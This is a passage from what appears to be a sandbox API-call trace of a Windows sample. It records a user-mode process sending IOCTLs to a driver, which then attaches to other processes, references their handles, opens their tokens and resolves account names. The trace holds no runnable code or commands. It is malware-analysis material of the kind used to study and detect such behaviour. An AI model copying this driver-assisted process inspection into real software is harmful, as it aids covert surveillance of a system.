Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.897] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.897] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.897] PsAcquireProcessExitSynchronization () returned 0x0 [0151.897] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0) [0151.897] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.897] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.897] PsReleaseProcessExitSynchronization () returned 0x2 [0151.897] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0151.897] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a4044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.898] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.898] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.898] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x79c) returned 0xc8 [0151.898] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.898] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f73350, HandleInformation=0x0) returned 0x0 [0151.898] ObOpenObjectByPointer (in: Object=0xfffffa8001f73350, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.898] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x14 [0151.899] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.899] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.899] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.899] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.899] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.902] CloseHandle (hObject=0xc4) returned 1 [0151.902] CloseHandle (hObject=0xc8) returned 1 [0151.902] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.903] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.903] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.903] PsAcquireProcessExitSynchronization () returned 0x0 [0151.903] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0) [0151.903] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f9af20, HandleInformation=0x0) returned 0x0 [0151.903] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.903] PsReleaseProcessExitSynchronization () returned 0x2 [0151.903] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0151.903] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a5044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.904] ObfDereferenceObject (Object=0xfffffa8001f9af20) returned 0x1 [0151.904] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.904] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.904] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.904] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0151.904] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.904] PsAcquireProcessExitSynchronization () returned 0x0 [0151.904] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0) [0151.904] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f73b50, HandleInformation=0x0) returned 0x0 [0151.905] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.905] PsReleaseProcessExitSynchronization () returned 0x2 [0151.905] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0151.905] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a6044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.905] ObfDereferenceObject (Object=0xfffffa8001f73b50) returned 0x1 [0151.905] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.905] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.905] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.905] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.906] PsLookupProcessByProcessId (in: ProcessId=0x79c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.906] PsAcquireProcessExitSynchronization () returned 0x0 [0151.906] KeStackAttachProcess (in: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f73350, ApcState=0xfffff880051635d0) [0151.906] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.906] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.906] PsReleaseProcessExitSynchronization () returned 0x2 [0151.906] ObfDereferenceObject (Object=0xfffffa8001f73350) returned 0x12 [0151.906] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a7044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.906] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.906] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.907] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0xc8 [0151.907] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.907] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001fcdb30, HandleInformation=0x0) returned 0x0 [0151.907] ObOpenObjectByPointer (in: Object=0xfffffa8001fcdb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.907] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x14 [0151.907] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.907] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.908] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.908] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.908] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.797] CloseHandle (hObject=0xc4) returned 1 [0152.797] CloseHandle (hObject=0xc8) returned 1 [0152.797] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.798] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.798] PsAcquireProcessExitSynchronization () returned 0x0 [0152.798] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0) [0152.798] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa4d10, HandleInformation=0x0) returned 0x0 [0152.798] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.798] PsReleaseProcessExitSynchronization () returned 0x2 [0152.798] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0152.798] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.798] ObfDereferenceObject (Object=0xfffffa8001fa4d10) returned 0x1 [0152.798] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.798] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.798] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0152.799] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.799] PsAcquireProcessExitSynchronization () returned 0x0 [0152.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0) [0152.799] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a3e260, HandleInformation=0x0) returned 0x0 [0152.799] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.799] PsReleaseProcessExitSynchronization () returned 0x2 [0152.799] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0152.799] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef0044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.799] ObfDereferenceObject (Object=0xfffffa8003a3e260) returned 0x1 [0152.799] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.799] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.799] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.800] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.800] PsLookupProcessByProcessId (in: ProcessId=0x7f4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.800] PsAcquireProcessExitSynchronization () returned 0x0 [0152.800] KeStackAttachProcess (in: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001fcdb30, ApcState=0xfffff880051635d0) [0152.800] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.800] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.800] PsReleaseProcessExitSynchronization () returned 0x2 [0152.800] ObfDereferenceObject (Object=0xfffffa8001fcdb30) returned 0x12 [0152.801] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003008044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003008044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.801] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.801] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xc8 [0152.801] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.801] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f5bb30, HandleInformation=0x0) returned 0x0 [0152.801] ObOpenObjectByPointer (in: Object=0xfffffa8001f5bb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.801] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x14 [0152.801] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.801] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.801] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.801] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.801] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.809] CloseHandle (hObject=0xc4) returned 1 [0152.809] CloseHandle (hObject=0xc8) returned 1 [0152.810] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.810] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0152.810] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.810] PsAcquireProcessExitSynchronization () returned 0x0 [0152.810] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0) [0152.810] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f74ae0, HandleInformation=0x0) returned 0x0 [0152.810] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.810] PsReleaseProcessExitSynchronization () returned 0x2 [0152.810] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0152.811] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fff044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fff044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.811] ObfDereferenceObject (Object=0xfffffa8001f74ae0) returned 0x1 [0152.811] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.811] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.811] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.811] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0152.811] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.811] PsAcquireProcessExitSynchronization () returned 0x0 [0152.811] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0) [0152.811] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f5b070, HandleInformation=0x0) returned 0x0 [0152.811] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.812] PsReleaseProcessExitSynchronization () returned 0x2 [0152.812] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0152.812] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163508) returned 0x0 [0152.812] ObfDereferenceObject (Object=0xfffffa8001f5b070) returned 0x1 [0152.812] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.812] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.812] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.812] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0152.812] PsLookupProcessByProcessId (in: ProcessId=0x7e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0152.812] PsAcquireProcessExitSynchronization () returned 0x0 [0152.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f5bb30, ApcState=0xfffff880051635d0) [0152.813] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0152.813] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0152.813] PsReleaseProcessExitSynchronization () returned 0x2 [0152.813] ObfDereferenceObject (Object=0xfffffa8001f5bb30) returned 0x12 [0152.813] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003007044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003007044, ReturnLength=0xfffff88005163550) returned 0x0 [0152.813] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0152.813] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.813] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0152.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0xc8 [0152.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0152.814] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f5eb30, HandleInformation=0x0) returned 0x0 [0152.814] ObOpenObjectByPointer (in: Object=0xfffffa8001f5eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0152.814] ObfDereferenceObject (Object=0xfffffa8001f5eb30) returned 0x14 [0152.814] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8001eb4ec0 | out: TokenHandle=0xfffffa8001eb4ec0*=0xc4) returned 0x0 [0152.814] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0152.814] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0152.814] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0152.814] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0152.817] CloseHandle (hObject=0xc4) returned 1 [0152.817] CloseHandle (hObject=0xc8) returned 1 [0152.818] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0152.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, 